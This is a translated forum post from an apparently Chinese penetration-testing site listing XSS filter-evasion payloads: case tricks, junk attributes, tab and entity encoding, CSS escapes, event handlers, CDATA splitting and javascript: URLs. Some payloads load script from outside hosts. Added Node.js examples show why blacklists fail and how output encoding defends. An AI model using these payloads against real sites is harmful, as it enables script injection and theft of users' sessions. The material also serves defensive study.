中国网络渗透测试联盟
Title: Cross Site Scripting (XSS) Attack Techniques
Author: admin
Posted: 2012-12-31 09:59
1. Vary the case of characters

HTML tag and attribute names are case-insensitive, so a filter that matches the literal lowercase "<script>" misses every other spelling:

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular expression checks

Filters that expect a well-formed tag, or that anchor on "<script" followed directly by ">", are thrown off by a stray "<", by junk attributes, and by attribute values containing the quote or ">" character the filter takes as the end of the tag (t.js stands for any attacker-hosted script):

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use an extension other than .js

The browser executes whatever the src response body contains; the file extension is irrelevant. The server does still have to return a script-compatible Content-Type: current browsers refuse to run a script served with an image, audio or video type, and with X-Content-Type-Options: nosniff any non-JavaScript type.

<script src="bad.jpg"></script>
4. Put JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
    background-image: url('javascript:alert("XSS");')
}

Caveat: javascript: URLs inside CSS url() were executed only by old Internet Explorer and Netscape; current browsers treat them as an invalid image URL and load nothing.
5. Insert other characters inside the script tag

The HTML tokenizer treats "/" like whitespace between a tag name and its attributes, so a "/" or an arbitrary word can stand in for the space a filter expects:

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
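Added here as a worked example, not code from the original post: the two kinds of regex blacklist that the payloads of sections 1, 2 and 5 are aimed at, the event-handler case from section 9 further down that no tag-name blacklist can cover, and the context-aware output encoding that makes the attacker's spelling irrelevant. Node.js with no dependencies; the payloads are the post's own (t.js is its placeholder), the function and constant names are this example's.

```javascript
// Added example, not part of the original post: regex blacklists of the kind
// that sections 1, 2 and 5 bypass (and section 9 sidesteps entirely), next to
// the defence that does not depend on guessing the attacker's spelling.
// Node.js, no dependencies. Payloads are the post's own; function names are
// this example's.

const PAYLOADS = {
  caseVariation: "<sCript>alert('d')</scRipT>",           // section 1
  junkAttribute: '<SCRIPT a=">" SRC="t.js"></SCRIPT>',     // section 2
  slashSeparator: '<SCRIPT/SRC="t.js"></SCRIPT>',          // section 5
  eventHandler: "<body onload=\"alert('onload')\">",      // section 9
};

// Filter 1: the classic mistake, a case-sensitive match on one exact spelling.
const NAIVE_RE = /<script>/;
function naiveFilterCatches(input) {
  return NAIVE_RE.test(input);
}

// Filter 2: what gets written after reading sections 1, 2 and 5. Case-insensitive,
// tolerates whitespace after "<", and ends the tag name on anything the HTML
// tokenizer ends it on: whitespace, "/" or ">".
const TAG_RE = /<\s*script[\s\/>]/i;
function betterFilterCatches(input) {
  return TAG_RE.test(input);
}
// Still a blacklist: section 9 needs no <script> at all, and the on* handler
// list is open-ended, so the next bypass is only a new attribute away.

// Defence: encode for the output context instead of filtering input. In HTML
// text and in quoted attribute values these five characters are the only ones
// that can change parser state, so encoding them is sufficient for those two
// contexts (URL and event-handler attributes need their own rules and should
// not receive attacker data at all).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Untrusted text placed into both a text node and a quoted attribute.
function renderComment(untrusted) {
  const safe = escapeHtml(untrusted);
  return `<p class="comment" title="${safe}">${safe}</p>`;
}

// Tag openers the tokenizer would act on: "<" immediately followed by a letter.
function tagOpeners(html) {
  return (html.match(/<[A-Za-z]/g) || []).length;
}

// For each payload: did each filter fire, and how many tags did the payload
// manage to open once rendered through escapeHtml (the template's own <p>
// is subtracted).
function demo() {
  return Object.entries(PAYLOADS).map(([name, p]) => ({
    name,
    naiveCatches: naiveFilterCatches(p),
    betterCatches: betterFilterCatches(p),
    attackerTags: tagOpeners(renderComment(p)) - 1,
  }));
}

console.table(demo());
```

The table shows the pattern the rest of this post keeps illustrating: each tightening of the blacklist catches the previous round of payloads and misses the next, while the encoded output opens zero attacker tags regardless of how the input was spelled.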
6. Use tabs or newlines to evade

Browsers delete ASCII tab, LF and CR characters from a URL before parsing it, so "javascript:" split by them is still "javascript:" to the URL parser while a string match for "javascript:" on the raw input fails. The control characters were lost when this post was rendered; [TAB] and [LF] below stand for a literal tab (0x09) and newline (0x0A):

<img src="jav[TAB]ascr[TAB]ipt:alert('XSS3')">      -> tab

<img src="jav[LF]ascr[LF]ipt:alert('XSS3')">        -> new line

<IMG SRC="jav[TAB]ascript:alert('XSS');">

Caveat: javascript: in IMG SRC ran only in old Internet Explorer and Netscape; current browsers do not execute script from an image source. The same stripping applies to navigation URLs (A HREF, IFRAME SRC), where javascript: still runs.
7. Use "\" to evade

The CSS tokenizer resolves a backslash before a non-hex character to that character and drops /* */ comments, so "expre\ssi\on" and "expr/*anyword*/ession" both become "expression" once parsed:

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

The last one also defeats filters that strip comments with a regular expression: the "*//*" inside the quoted string makes such a filter swallow the wrong span, while a real CSS parser treats it as string content. Caveat: expression() is an Internet Explorer extension, disabled from IE8 standards mode onward and absent from every other browser.
8. Use hex encoding to evade (the ";" can also be dropped)

Attribute values are entity-decoded before the URL or CSS parser sees them, so any character of the payload can be written as a numeric character reference, and HTML accepts the numeric form without its terminating ";" as well. The post's own encoded lines were decoded when the page was rendered, so the encoded forms below are reconstructed with the keyword written as hex entities:

encoded: <DIV STYLE="width: &#x65;&#x78;&#x70;&#x72;&#x65;&#x73;&#x73;&#x69;&#x6F;&#x6E;(alert('XSS31'));">

source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

encoded: <META HTTP-EQUIV="refresh" CONTENT="0;url=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74:alert('abc');">

source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Caveat: current browsers refuse a javascript: URL in a META refresh; the decoding step itself still applies to every attribute.
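Added here as a worked example, not code from the original post: the decoding a browser performs before the payloads of sections 6, 7 and 8 above (and the javascript: URLs of section 14 below) reach its URL or CSS parser, written out in Node.js so that a server-side check can be made against the decoded form rather than the raw bytes. The payloads are the post's own; the function names and the regex-based "naive" check are this example's.

```javascript
// Added example, not part of the original post: the decoding a browser applies
// before it sees the section 6, 7, 8 and 14 payloads, made explicit so that a
// server-side check compares against what will actually execute rather than
// the raw bytes. Node.js, no dependencies. Payloads are the post's own;
// function names are this example's.

// Section 8: an attribute value is entity-decoded before the URL or CSS parser
// runs, and a numeric entity decodes with or without its trailing ";".
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
function decodeHtmlAttribute(value) {
  return value.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    const cp = hex ? parseInt(hex, 16) : dec ? parseInt(dec, 10) : -1;
    if (cp >= 0) return cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
    const ch = NAMED_ENTITIES[name.toLowerCase()];
    return ch === undefined ? m : ch;
  });
}

// Sections 6 and 14: the URL parser strips leading and trailing C0 controls and
// spaces, deletes every ASCII tab, LF and CR wherever it occurs, and matches the
// scheme case-insensitively, so "jav<TAB>ascr<LF>ipt:" is "javascript:".
function normalizeUrl(decoded) {
  return decoded.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '').replace(/[\t\n\r]/g, '');
}
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}
function attributeUrlScheme(rawAttributeValue) {
  return schemeOf(normalizeUrl(decodeHtmlAttribute(rawAttributeValue)));
}
// <META HTTP-EQUIV="refresh"> carries its URL inside CONTENT="0;url=...".
function refreshScheme(rawContentValue) {
  const m = /;\s*url\s*=\s*(.*)$/i.exec(decodeHtmlAttribute(rawContentValue));
  return m ? schemeOf(normalizeUrl(m[1])) : null;
}

// Section 7: the CSS tokenizer turns "\s" into "s" and "\73 " (hex) into "s",
// and drops /* */ comments, but only outside string tokens. A one-pass scanner
// that tracks the current quote character reproduces that.
const HEX_DIGIT = /[0-9a-f]/i;
function normalizeCss(css) {
  let out = '';
  let quote = null;
  for (let i = 0; i < css.length; i++) {
    const c = css[i];
    if (c === '\\') {
      let j = i + 1;
      let hex = '';
      while (j < css.length && hex.length < 6 && HEX_DIGIT.test(css[j])) hex += css[j++];
      if (hex) {
        const cp = parseInt(hex, 16);
        out += cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
        if (j < css.length && /\s/.test(css[j])) j++; // one optional whitespace ends a hex escape
        i = j - 1;
      } else if (j < css.length) {
        out += css[j]; // "\X" with non-hex X is a literal X
        i = j;
      }
    } else if (quote) {
      if (c === quote) quote = null;
      out += c;
    } else if (c === '"' || c === "'") {
      quote = c;
      out += c;
    } else if (c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      i = end === -1 ? css.length : end + 1; // comment dropped
    } else {
      out += c;
    }
  }
  return out;
}
const CSS_DANGER = /expression\s*\(|(?:^|[^a-z])javascript:/i;
function dangerousStyleAttribute(rawStyleValue) {
  return CSS_DANGER.test(normalizeCss(decodeHtmlAttribute(rawStyleValue)));
}
// The shortcut many filters take: regex-strip comments, then delete backslashes.
// The last section-7 payload defeats it: the "*//*" inside a quoted string makes
// the regex swallow "ex/*XSS" as comment text, so "expression" never forms.
function naiveStyleCheck(rawStyleValue) {
  const stripped = rawStyleValue.replace(/\/\*[\s\S]*?\*\//g, '').replace(/\\/g, '');
  return CSS_DANGER.test(stripped);
}

const STRING_TRICK = 'no\\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))';
console.log(attributeUrlScheme("jav&#x09;ascr&#x0A;ipt:alert('XSS3')"));                       // javascript
console.log(refreshScheme("0;url=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74:alert('abc');")); // javascript
console.log(normalizeCss(STRING_TRICK));          // noxss:noxss("*//*"); xss:expression(alert("XSS"))
console.log(dangerousStyleAttribute(STRING_TRICK), naiveStyleCheck(STRING_TRICK)); // true false
```

The order of operations is the whole point: entity-decode first, then normalize the way the URL or CSS tokenizer does, and only then compare. A check run on the raw attribute value tests a string the browser never sees, which is why every payload in sections 6 to 8 exists.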
9. Script in HTML tag attributes (event handlers)

No <script> tag is needed: any element can carry an on* event-handler attribute, and the set of handlers is large and grows with each browser release, so a blacklist of handler names is never complete. The list below is the Internet Explorer handler set of the time.

<body onload="alert('onload')">
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF

AllowScriptAccess="always" lets the Flash movie call JavaScript in the origin of the embedding page, so a hostile SWF is equivalent to an inline script (Flash is no longer supported by current browsers):

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and reassemble it

Internet Explorer XML data islands: the payload is split across CDATA sections, or across an HTML comment inside the XML, so no single fragment contains "javascript:"; a SPAN bound to the island with DATAFORMATAS=HTML reassembles the pieces and renders them as HTML (IE-only, and data islands were removed from IE10 onward):

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME

HTML+TIME, Internet Explorer's timed-multimedia extension, can set any attribute of an element, innerHTML included; with a deferred script the injected markup executes (IE-only). The inner quotes of the payload must be written as &quot; to keep the attribute intact:

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert(&quot;XSS&quot;)</SCRIPT>">
</BODY></HTML>
13. Write a cookie via META

The Set-Cookie META tag stores the script in a cookie; it fires wherever the application later echoes that cookie value into a page without encoding it (current browsers ignore Set-Cookie in META):

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

Any attribute that takes a URL is a possible carrier for the javascript: scheme. Caveat: of the attributes below, only the frame sources (IFRAME SRC, FRAME SRC) still execute javascript: in current browsers, because they are navigations; IMG SRC, DYNSRC, LOWSRC, LINK HREF, TABLE BACKGROUND and CSS url() did so only in old Internet Explorer and Netscape.

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2